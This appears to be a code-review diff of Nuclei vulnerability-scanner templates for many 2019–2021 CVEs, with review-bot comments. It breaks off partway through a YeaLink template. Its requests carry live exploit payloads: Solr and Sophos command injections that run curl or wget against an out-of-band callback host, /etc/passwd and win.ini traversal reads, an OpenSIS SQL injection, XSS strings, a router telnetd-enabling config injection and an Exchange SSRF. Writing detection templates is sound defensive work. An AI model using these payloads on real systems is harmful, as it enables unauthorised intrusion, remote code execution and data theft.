command=full-import&verbose=false&clean=false&commit=true&debug=true&core=test&dataConfig=%3CdataConfig%3E%0A++%3CdataSource+type%3D%22URLDataSource%22%2F%3E%0A++%3Cscript%3E%3C!%5BCDATA%5B%0A++++++++++function+poc()%7B+java.lang.Runtime.getRuntime().exec(%22curl%20http://{{interactsh-url}}%22)%3B%0A++++++++++%7D%0A++%5D%5D%3E%3C%2Fscript%3E%0A++%3Cdocument%3E%0A++++%3Centity+name%3D%22stackoverflow%22%0A++++++++++++url%3D%22https%3A%2F%2Fstackoverflow.com%2Ffeeds%2Ftag%2Fsolr%22%0A++++++++++++processor%3D%22XPathEntityProcessor%22%0A++++++++++++forEach%3D%22%2Ffeed%22%0A++++++++++++transformer%3D%22script%3Apoc%22+%2F%3E%0A++%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E&name=dataimport
extractors:
- type: regex
internal: true
name: core
group: 1
regex:
- '"name"\:"(.*?)"'
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
- type: status
status:
- 200
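Review bot: The key in the info block is spelled `refrense:`, so the three links are stored under an unknown key rather than as the template's `reference`; rename it to `reference:` and, as elsewhere, drop the `|` so the items parse as a list. The POST body also hard-codes `core=test` while the request line uses the extracted `{{core}}`; the two should agree, `core={{core}}`, or the literal may point the import at a core that does not exist on the target.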


@ -7,6 +7,7 @@ info:
reference: reference:
- https://seclists.org/fulldisclosure/2019/May/50 - https://seclists.org/fulldisclosure/2019/May/50
- https://wwws.nightwatchcybersecurity.com/2019/05/27/xss-in-ssi-printenv-command-apache-tomcat-cve-2019-0221/ - https://wwws.nightwatchcybersecurity.com/2019/05/27/xss-in-ssi-printenv-command-apache-tomcat-cve-2019-0221/
- https://www.exploit-db.com/exploits/50119
description: | description: |
The SSI printenv command in Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39 and The SSI printenv command in Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39 and
7.0.0 to 7.0.93 echoes user provided data without escaping and is, 7.0.0 to 7.0.93 echoes user provided data without escaping and is,
@ -18,6 +19,7 @@ requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E" - "{{BaseURL}}/printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E"
- "{{BaseURL}}/ssi/printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E"
matchers-condition: and matchers-condition: and
matchers: matchers:


@ -0,0 +1,29 @@
id: CVE-2019-12276
info:
name: GrandNode 4.40 - Path Traversal
author: daffainfo
severity: high
description: Path Traversal vulnerability in Controllers/LetsEncryptController.cs in LetsEncryptController in GrandNode 4.40 allows remote, unauthenticated attackers to retrieve arbitrary files on the web server via specially crafted LetsEncrypt/Index?fileName= HTTP requests. A patch for this issue was made on 2019-05-30 in GrandNode 4.40.
reference: |
- https://security401.com/grandnode-path-traversal/
- https://www.cvedetails.com/cve/CVE-2019-12276
tags: cve,cve2019,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/LetsEncrypt/Index?fileName=/etc/passwd"
headers:
Connection: close
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200


@ -2,7 +2,7 @@ id: CVE-2019-12616
info: info:
name: phpMyAdmin CSRF name: phpMyAdmin CSRF
author: Mohammedsaneem author: Mohammedsaneem,philippedelteil
description: A vulnerability was found that allows an attacker to trigger a CSRF attack against a phpMyAdmin user. The attacker can trick the user, for instance through a broken <img> tag pointing at the victim's phpMyAdmin database, and the attacker can potentially deliver a payload (such as a specific INSERT or DELETE statement) through the victim. description: A vulnerability was found that allows an attacker to trigger a CSRF attack against a phpMyAdmin user. The attacker can trick the user, for instance through a broken <img> tag pointing at the victim's phpMyAdmin database, and the attacker can potentially deliver a payload (such as a specific INSERT or DELETE statement) through the victim.
severity: medium severity: medium
tags: cve,cve2019,phpmyadmin,csrf tags: cve,cve2019,phpmyadmin,csrf
@ -18,12 +18,18 @@ requests:
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: word - type: word
words: words:
- "4.6.6deb4+deb9u2" - "phpmyadmin.net"
- "phpMyAdmin" - "phpMyAdmin"
condition: and condition: or
- type: regex
regex:
- 'v=[1-4]\.[0-8]\.' # Fix in 4.9.0
- type: status - type: status
status: status:
- 200 - 200
- 401 #password protected
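Review bot: The new version regex `v=[1-4]\.[0-8]\.` is not tied to a phpMyAdmin asset, so a `?v=1.2.` cache-buster on any script or stylesheet in the page would satisfy it, and with the word matcher relaxed to `or` on `phpMyAdmin` alone the template now flags pages on weaker evidence than before. Anchor the regex to whatever resource the `v=` parameter belongs to on the login page, or at least require `phpmyadmin.net` and the version together by keeping `condition: and` for that pair. The inline comment would also read better with the range it encodes, `# matches 1.x-4.8.x; fixed in 4.9.0`.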


@ -0,0 +1,36 @@
id: CVE-2019-16313
info:
name: ifw8 Router ROM v4.31 allows credential disclosure
author: pikpikcu
severity: high
description: ifw8 Router ROM v4.31 allows credential disclosure by reading the action/usermanager.htm HTML source code.
reference: |
- https://github.com/Mr-xn/Penetration_Testing_POC/blob/master/CVE-2019-16313%20%E8%9C%82%E7%BD%91%E4%BA%92%E8%81%94%E4%BC%81%E4%B8%9A%E7%BA%A7%E8%B7%AF%E7%94%B1%E5%99%A8v4.31%E5%AF%86%E7%A0%81%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.md
- https://nvd.nist.gov/vuln/detail/CVE-2019-16313
tags: cve,cve2019,lfi
requests:
- method: GET
path:
- '{{BaseURL}}/action/usermanager.htm'
matchers-condition: and
matchers:
- type: word
words:
- 'user'
- 'pwd'
part: body
condition: and
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- '<td class="pwd" data="([a-z]+)">\*\*\*\*\*\*<\/td>'
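Review bot: The body matcher on the words `user` and `pwd` is too weak to pin this finding: both strings appear on ordinary login pages, and the project's own contribution guidance asks to avoid short words that could be encountered anywhere. Match on the fragment the extractor already keys on, replacing the two entries with `- '<td class="pwd" data="'`, which only a page carrying the disclosed-credential cell will contain. The `lfi` tag also does not describe a credential disclosure via HTML source; a more specific tag would help filtering.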


@ -5,7 +5,9 @@ info:
author: daffainfo author: daffainfo
severity: medium severity: medium
description: In the api-bearer-auth plugin before 20190907 for WordPress, the server parameter is not correctly filtered in the swagger-config.yaml.php file, and it is possible to inject JavaScript code, aka XSS. description: In the api-bearer-auth plugin before 20190907 for WordPress, the server parameter is not correctly filtered in the swagger-config.yaml.php file, and it is possible to inject JavaScript code, aka XSS.
reference: https://nvd.nist.gov/vuln/detail/CVE-2019-16332 reference: |
- https://plugins.trac.wordpress.org/changeset/2152730
- https://wordpress.org/plugins/api-bearer-auth/#developers
tags: cve,cve2019,wordpress,xss,wp-plugin tags: cve,cve2019,wordpress,xss,wp-plugin
requests: requests:


@ -4,7 +4,7 @@ info:
author: pikpikcu,madrobot author: pikpikcu,madrobot
severity: critical severity: critical
reference: https://nvd.nist.gov/vuln/detail/CVE-2019-17558 reference: https://nvd.nist.gov/vuln/detail/CVE-2019-17558
tags: cve,cve2019,apache,rce,solr tags: cve,cve2019,apache,rce,solr,oob
requests: requests:
- raw: - raw:
@ -15,15 +15,10 @@ requests:
Connection: close Connection: close
- | - |
POST /solr/{{collection}}/config HTTP/1.1 POST /solr/{{core}}/config HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Connection: close
Content-Type: application/json Content-Type: application/json
Content-Length: 259 Content-Length: 259
Upgrade-Insecure-Requests: 1
{ {
"update-queryresponsewriter": { "update-queryresponsewriter": {
@ -37,25 +32,25 @@ requests:
} }
- | - |
GET /solr/{{collection}}/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27nslookup%20example.com%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1 GET /solr/{{core}}/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27curl%20http://{{interactsh-url}}%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Connection: close Connection: close
Upgrade-Insecure-Requests: 1
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
- type: status
status:
- 200
extractors: extractors:
- type: regex - type: regex
regex:
- '"status"\:\{"(.*?)"\:\{"name"'
name: collection
group: 1
internal: true internal: true
name: core
matchers: group: 1
- type: word regex:
words: - '"name"\:"(.*?)"'
- "Non-authoritative answer"
- "example.com"
condition: and
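Review bot: `Content-Length: 259` stays hard-coded on the config request while the JSON body it describes lies outside this hunk; the header is only correct as long as that body never changes by a byte, and a stale length makes Solr read a truncated or over-long body. As far as I recall nuclei computes the length itself for raw requests unless unsafe mode is used, so the line can be dropped; if it must stay, recompute it against the final body. The extractor regex `'"name"\:"(.*?)"'` in the last hunk also takes the first `"name"` in the cores listing — same caveat as for CVE-2017-12629 and CVE-2019-0193 in this commit.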


@ -13,7 +13,7 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/../../../../../../../../../../../Windows/win.ini" - "{{BaseURL}}/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fwin.ini"
matchers-condition: and matchers-condition: and
matchers: matchers:


@ -3,8 +3,10 @@ id: CVE-2019-3401
info: info:
name: Atlassian JIRA Information Exposure (CVE-2019-3401) name: Atlassian JIRA Information Exposure (CVE-2019-3401)
author: TechbrunchFR,milo2012 author: TechbrunchFR,milo2012
description: The ManageFilters.jspa resource in Jira before version 7.13.3 and from version 8.0.0 before version 8.1.1 allows remote attackers to enumerate usernames via an incorrect authorisation check.
severity: info severity: info
tags: cve,cve2019,jira,atlassian tags: cve,cve2019,jira,atlassian
reference: https://jira.atlassian.com/browse/JRASERVER-69244
requests: requests:
- method: GET - method: GET



@ -8,17 +8,23 @@ info:
reference: reference:
- https://www.tenable.com/blog/cve-2019-8451-proof-of-concept-available-for-server-side-request-forgery-ssrf-vulnerability-in - https://www.tenable.com/blog/cve-2019-8451-proof-of-concept-available-for-server-side-request-forgery-ssrf-vulnerability-in
- https://jira.atlassian.com/browse/JRASERVER-69793 - https://jira.atlassian.com/browse/JRASERVER-69793
tags: cve,cve2019,atlassian,jira,ssrf - https://hackerone.com/reports/713900
tags: cve,cve2019,atlassian,jira,ssrf,oob
requests: requests:
- method: GET - method: POST
path: path:
- '{{BaseURL}}/plugins/servlet/gadgets/makeRequest?url=https://{{Hostname}}:1337@example.com' - '{{BaseURL}}/plugins/servlet/gadgets/makeRequest'
body: |
url=https://{{Hostname}}:443@{{interactsh-url}}
headers: headers:
X-Atlassian-token: no-check X-Atlassian-token: no-check
Content-Type: application/x-www-form-urlencoded
matchers: matchers:
- type: word - type: word
name: ssrf-response-body part: interactsh_protocol
words: words:
- '<p>This domain is for use in illustrative examples in documents.' - "http" # Confirms the HTTP Interaction
part: body
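Review bot: `body: |` on the new POST request keeps a trailing newline, so the form body is sent as `url=https://{{Hostname}}:443@{{interactsh-url}}` followed by a line break; `body: |-` sends exactly the one parameter, which is the safer form for an `application/x-www-form-urlencoded` body. The same `body: |` chomping appears in the new CVE-2020-6637 template later in this commit. Matching on `interactsh_protocol` and adding the `oob` tag is consistent with the other templates converted in this commit.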


@ -0,0 +1,26 @@
id: CVE-2019-9618
info:
name: GraceMedia Media Player 1.0 - Local File Inclusion
author: 0x_Akoko
severity: critical
reference: |
- https://www.exploit-db.com/exploits/46537
- https://nvd.nist.gov/vuln/detail/CVE-2019-9618
tags: cve,cve2019,wordpress,wp-plugin,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200
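Review bot: `reference: |` in the new template turns the two `- https://…` lines into one literal string rather than a YAML list, unlike the plain `reference:` sequence used by the CVE-2019-8451 template in this commit; dropping the `|` gives a real list: `reference:` / `- https://www.exploit-db.com/exploits/46537` / `- https://nvd.nist.gov/vuln/detail/CVE-2019-9618`. The same literal-block form is used in the new CVE-2020-25223, CVE-2020-35598, CVE-2020-6637, CVE-2020-7796, CVE-2021-20090, CVE-2021-20091, CVE-2021-20092 and CVE-2021-24320 templates in this commit. Separately, `root:[x*]:0:0` is a one-character class (it matches `root:x:0:0` or `root:*:0:0` only) while the CVE-2020-35598 template uses `root:.*:0:0`; one form should be used consistently.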


@ -3,7 +3,7 @@ id: CVE-2020-13927
info: info:
name: Unauthenticated Airflow Experimental REST API name: Unauthenticated Airflow Experimental REST API
author: pdteam author: pdteam
severity: medium severity: critical
tags: cve,cve2020,apache,airflow,unauth tags: cve,cve2020,apache,airflow,unauth
requests: requests:


@ -17,6 +17,7 @@ requests:
- method: GET - method: GET
path: path:
- '{{BaseURL}}/wp-content/uploads/wp-file-manager-pro/fm_backup/' - '{{BaseURL}}/wp-content/uploads/wp-file-manager-pro/fm_backup/'
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: status - type: status
@ -26,3 +27,6 @@ requests:
- type: word - type: word
words: words:
- 'Index of' - 'Index of'
- 'wp-content/uploads/wp-file-manager-pro/fm_backup'
- 'backup_'
condition: and


@ -0,0 +1,36 @@
id: CVE-2020-25223
info:
name: Sophos UTM - Preauth RCE
author: gy741
severity: critical
description: A remote code execution vulnerability exists in the WebAdmin of Sophos SG UTM before v9.705 MR5, v9.607 MR7, and v9.511 MR11
reference: |
- https://www.atredis.com/blog/2021/8/18/sophos-utm-cve-2020-25223
tags: cve,cve2020,sophos,rce,oob
requests:
- raw:
- |
POST /var HTTP/1.1
Host: {{Hostname}}
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.5.1.1
Content-type: application/json; charset=UTF-8
Origin: {{BaseURL}}
Connection: close
Referer: {{BaseURL}}
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
{"objs": [{"FID": "init"}], "SID": "|wget http://{{interactsh-url}}|", "browser": "gecko_linux", "backend_version": -1, "loc": "", "_cookie": null, "wdebug": 0, "RID": "1629210675639_0.5000855117488202", "current_uuid": "", "ipv6": true}
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"


@ -0,0 +1,26 @@
id: CVE-2020-27361
info:
name: Akkadian Provisioning Manager - Files Listing
author: gy741
severity: high
description: An issue exists within Akkadian Provisioning Manager 4.50.02 which allows attackers to view sensitive information within the /pme subdirectories.
reference: https://www.blacklanternsecurity.com/2021-07-01-Akkadian-CVE/
tags: cve,cve2020,akkadian,listing,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/pme/media/"
matchers-condition: and
matchers:
- type: word
words:
- "Index of /pme/media"
- "Parent Directory"
condition: and
- type: status
status:
- 200


@ -26,5 +26,11 @@ requests:
- type: regex - type: regex
regex: regex:
- '^= ([0-4]\.[0-9\.]+|5\.[0-2]|5\.[0-2]\.[0-9]+|5\.3\.[0-1]) =' - '^== Changelog =="'
part: body
- type: regex
regex:
- '^= (5\.3\.[2-9]+|5\.[4-9]+\.|[6-9]\.[0-9]+\.[0-9]+|1[0-9]+\.) ='
negative: true
part: body part: body
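Review bot: The new regex `'^== Changelog =="'` ends in a double quote that a `== Changelog ==` heading does not contain; if that `"` is a typo the matcher never fires and it should read `'^== Changelog =='`. Both patterns also anchor with `^`, which in Go's RE2 binds to the start of the whole body unless multiline mode is enabled; if the engine does not set it, `(?m)^…` is required for a per-line anchor. The negative pattern's `5\.3\.[2-9]+` alternative does not cover patch levels of ten or more (e.g. `5.3.10`), so such a version would not be excluded. The request block this hunk belongs to starts above the hunk.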


@ -0,0 +1,27 @@
id: CVE-2020-35598
info:
name: Advanced Comment System 1.0 - Path Traversal
author: daffainfo
severity: high
description: ACS Advanced Comment System 1.0 is affected by Directory Traversal via an advanced_component_system/index.php?ACS_path=..%2f URI.
reference: |
- https://www.exploit-db.com/exploits/49343
- https://www.cvedetails.com/cve/CVE-2020-35598
tags: cve,cve2020,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/advanced_component_system/index.php?ACS_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200


@ -0,0 +1,40 @@
id: CVE-2020-6637
info:
name: OpenSIS v7.3 unauthenticated SQL injection
author: pikpikcu
severity: high
description: openSIS Community Edition version 7.3 is vulnerable to SQL injection via the USERNAME parameter of index.php.
tags: cve,cve2020,sqli,opensis
reference: |
- https://nvd.nist.gov/vuln/detail/CVE-2020-6637
- https://cinzinga.com/CVE-2020-6637/
requests:
- method: POST
path:
- '{{BaseURL}}/account/index.php'
- '{{BaseURL}}/opensis/index.php'
- '{{BaseURL}}/index.php'
headers:
Content-Type: application/x-www-form-urlencoded
body: |
USERNAME=%27%29or%601%60%3D%601%60%3B--+-&PASSWORD=A&language=en&log=
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'SQL STATEMENT:'
- "<TD>UPDATE login_authentication SET FAILED_LOGIN=FAILED_LOGIN+1 WHERE UPPER(USERNAME)=UPPER(NULL)or`1`=`1`;-- -')</TD>"
condition: and
- type: word
part: header
words:
- "text/html"
condition: and
- type: status
status:
- 200


@ -0,0 +1,25 @@
id: CVE-2020-7796
info:
name: Zimbra Collaboration Suite (ZCS) - SSRF
author: gy741
severity: critical
description: Zimbra Collaboration Suite (ZCS) before 8.8.15 Patch 7 allows SSRF when WebEx zimlet is installed and zimlet JSP is enabled.
reference: |
- https://www.adminxe.com/2183.html
tags: cve,cve2020,zimbra,ssrf,oob
requests:
- raw:
- |
GET /zimlet/com_zimbra_webex/httpPost.jsp?companyId=http://{{interactsh-url}}%23 HTTP/1.1
Host: {{Hostname}}
User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"


@ -0,0 +1,33 @@
id: CVE-2021-20090
info:
name: Buffalo WSR-2533DHPL2 - Path Traversal
author: gy741
severity: critical
description: |
A path traversal vulnerability in the web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 could allow unauthenticated remote attackers to bypass authentication.
reference: |
- https://nvd.nist.gov/vuln/detail/CVE-2021-20090
- https://www.tenable.com/security/research/tra-2021-13
- https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2
tags: cve,cve2021,lfi,buffalo,firmware,iot
requests:
- raw:
- |
GET /images/..%2finfo.html HTTP/1.1
Host: {{Hostname}}
Referer: {{BaseURL}}/info.html
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- 'URLToken(cgi_path)'
- 'pppoe'
- 'wan'
condition: and


@ -0,0 +1,47 @@
id: CVE-2021-20091
info:
name: Buffalo WSR-2533DHPL2 - Configuration File Injection
author: gy741,pdteam,parth
severity: critical
description: |
The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly sanitize user input. An authenticated remote attacker could leverage this vulnerability to alter device configuration, potentially gaining remote code execution.
reference: |
- https://nvd.nist.gov/vuln/detail/CVE-2021-20091
- https://www.tenable.com/security/research/tra-2021-13
- https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2
tags: cve,cve2021,buffalo,firmware,iot
requests:
- raw:
- |
GET /images/..%2finfo.html HTTP/1.1
Host: {{Hostname}}
Referer: {{{{BaseURL}}}}/info.html
- |
POST /images/..%2fapply_abstract.cgi HTTP/1.1
Host: {{Hostname}}
Referer: {{BaseURL}}/info.html
Content-Type: application/x-www-form-urlencoded
action=start_ping&httoken={{trimprefix(base64_decode(httoken), base64_decode("R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"))}}&submit_button=ping.html&action_params=blink_time%3D5&ARC_ping_ipaddress=127.0.0.1%0AARC_SYS_TelnetdEnable=1&ARC_ping_status=0&TMP_Ping_Type=4
matchers-condition: and
matchers:
- type: word
part: header
words:
- "/Success.htm"
- type: status
status:
- 302
extractors:
- type: regex
name: httoken
internal: true
group: 1
regex:
- 'base64\,(.*?)" border='
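Review bot: `Referer: {{{{BaseURL}}}}/info.html` in the first raw request uses four braces, while the second request and the sibling CVE-2021-20090 template use `Referer: {{BaseURL}}/info.html`; unless the doubled braces are deliberate escaping, the header is sent with a literal `{{…}}` wrapper around the expanded value. The same four-brace form appears in the new CVE-2021-20092 template. The second request's body includes `ARC_SYS_TelnetdEnable=1`, which by its name appears to change the device's persistent configuration rather than only read it, so the template should carry the `intrusive` tag and say so in `description` so operators can exclude it by tag.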


@ -0,0 +1,55 @@
id: CVE-2021-20092
info:
name: Buffalo WSR-2533DHPL2 - Improper Access Control
author: gy741,pdteam,parth
severity: critical
description: |
The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly restrict access to sensitive information from an unauthorized actor.
reference: |
- https://nvd.nist.gov/vuln/detail/CVE-2021-20091
- https://www.tenable.com/security/research/tra-2021-13
- https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2
tags: cve,cve2021,buffalo,firmware,iot
requests:
- raw:
- |
GET /images/..%2finfo.html HTTP/1.1
Host: {{Hostname}}
Referer: {{{{BaseURL}}}}/info.html
- |
GET /images/..%2fcgi/cgi_i_filter.js?_tn={{trimprefix(base64_decode(httoken), base64_decode("R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"))}} HTTP/1.1
Host: {{Hostname}}
Cookie: lang=8; url=ping.html; mobile=false;
Referer: {{BaseURL}}/info.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 178
matchers-condition: and
matchers:
- type: word
part: header
words:
- "application/x-javascript"
- type: word
words:
- "/*DEMO*/"
- "addCfg("
condition: and
- type: status
status:
- 200
extractors:
- type: regex
name: httoken
internal: true
group: 1
regex:
- 'base64\,(.*?)" border='
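Review bot: The first reference, `- https://nvd.nist.gov/vuln/detail/CVE-2021-20091`, points at the previous CVE while this template's `id` is CVE-2021-20092; it should be `- https://nvd.nist.gov/vuln/detail/CVE-2021-20092`. The second raw request is a GET with no body but sets `Content-Length: 178`; a server that honours the header may wait for 178 bytes that never arrive and time out instead of answering, so the header should be removed. `Referer: {{{{BaseURL}}}}/info.html` has the same four-brace form raised on the CVE-2021-20091 template in this commit.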


@ -7,7 +7,9 @@ info:
description: The BuddyPress WordPress plugin was affected by an REST API Privilege Escalation to RCE description: The BuddyPress WordPress plugin was affected by an REST API Privilege Escalation to RCE
reference: reference:
- https://github.com/HoangKien1020/CVE-2021-21389 - https://github.com/HoangKien1020/CVE-2021-21389
- https://nvd.nist.gov/vuln/detail/CVE-2021-21389 - https://buddypress.org/2021/03/buddypress-7-2-1-security-release/
- https://codex.buddypress.org/releases/version-7-2-1/
- https://github.com/buddypress/BuddyPress/security/advisories/GHSA-m6j4-8r7p-wpp3
tags: cve,cve2021,wordpress,wp-plugin,rce tags: cve,cve2021,wordpress,wp-plugin,rce


@ -0,0 +1,28 @@
id: CVE-2021-21816
info:
name: D-LINK DIR-3040 - Syslog Information Disclosure
description: An information disclosure vulnerability exists in the Syslog functionality of D-LINK DIR-3040 1.13B03. A specially crafted network request can lead to the disclosure of sensitive information. An attacker can send an HTTP request to trigger this vulnerability.
author: gy741
severity: medium
reference: https://talosintelligence.com/vulnerability_reports/TALOS-2021-1281
tags: cve,cve2021,dlink,exposure,router
requests:
- method: GET
path:
- "{{BaseURL}}/messages"
matchers-condition: and
matchers:
- type: word
words:
- "syslog:"
- "admin"
- "/etc_ro/lighttpd/www"
part: body
condition: and
- type: status
status:
- 200


@ -0,0 +1,31 @@
id: CVE-2021-24235
info:
name: Goto - Tour & Travel < 2.0 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2021-24235
tags: cve,cve2021,wordpress,xss,wp-theme
requests:
- method: GET
path:
- '{{BaseURL}}/tour-list/?keywords=%3Cinput%2FAutofocus%2F%250D*%2FOnfocus%3Dalert%28123%29%3B%3E&start_date=xxxxxxxxxxxx&avaibility=13'
matchers-condition: and
matchers:
- type: word
words:
- "input/Autofocus/%0D*/Onfocus=alert(123);"
- "goto-tour-list-js-extra"
part: body
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
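Review bot: The body matcher `- "input/Autofocus/%0D*/Onfocus=alert(123);"` omits the `<` and `>` that the request sends (`%3Cinput…%3E`), so a page that encodes the angle brackets as entities before reflecting the value still matches and is reported as XSS. Matching the whole tag, `- "<input/Autofocus/%0D*/Onfocus=alert(123);>"`, confirms the reflection is unescaped. The `text/html` header check and the status-200 matcher are fine as written.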


@ -5,7 +5,9 @@ info:
author: daffainfo author: daffainfo
severity: medium severity: medium
description: The Bello - Directory & Listing WordPress theme before 1.6.0 did not properly sanitise and escape its listing_list_view, bt_bb_listing_field_my_lat, bt_bb_listing_field_my_lng, bt_bb_listing_field_distance_value, bt_bb_listing_field_my_lat_default, bt_bb_listing_field_keyword, bt_bb_listing_field_location_autocomplete, bt_bb_listing_field_price_range_from and bt_bb_listing_field_price_range_to parameter in ints listing page, leading to reflected Cross-Site Scripting issues. description: The Bello - Directory & Listing WordPress theme before 1.6.0 did not properly sanitise and escape its listing_list_view, bt_bb_listing_field_my_lat, bt_bb_listing_field_my_lng, bt_bb_listing_field_distance_value, bt_bb_listing_field_my_lat_default, bt_bb_listing_field_keyword, bt_bb_listing_field_location_autocomplete, bt_bb_listing_field_price_range_from and bt_bb_listing_field_price_range_to parameter in ints listing page, leading to reflected Cross-Site Scripting issues.
reference: https://nvd.nist.gov/vuln/detail/CVE-2021-24320 reference: |
- https://m0ze.ru/vulnerability/%5B2021-03-21%5D-%5BWordPress%5D-%5BCWE-79%5D-Bello-WordPress-Theme-v1.5.9.txt
- https://wpscan.com/vulnerability/6b5b42fd-028a-4405-b027-3266058029bb
tags: cve,cve2021,wordpress,xss,wp-plugin tags: cve,cve2021,wordpress,xss,wp-plugin
requests: requests:


@ -6,7 +6,7 @@ info:
severity: critical severity: critical
description: | description: |
Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078. Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078.
tags: cve,cve2021,ssrf,rce,exchange tags: cve,cve2021,ssrf,rce,exchange,oob
reference: reference:
- https://proxylogon.com/#timeline - https://proxylogon.com/#timeline
- https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse - https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse
@ -18,19 +18,10 @@ requests:
- | - |
GET /owa/auth/x.js HTTP/1.1 GET /owa/auth/x.js HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 Cookie: X-AnonResource=true; X-AnonResource-Backend={{interactsh-url}}/ecp/default.flt?~3;
Cookie: X-AnonResource=true; X-AnonResource-Backend=somethingnonexistent/ecp/default.flt?~3; X-BEResource=somethingnonexistent/owa/auth/logon.aspx?~3;
Accept-Language: en
Connection: close
matchers-condition: and
matchers: matchers:
- type: status
status:
- 500
- 503
- type: word - type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words: words:
- 'X-Calculatedbetarget: somethingnonexistent' - "http"
part: header


@ -0,0 +1,38 @@
id: CVE-2021-27561
info:
name: YeaLink DM PreAuth RCE
author: shifacyclewala,hackergautam
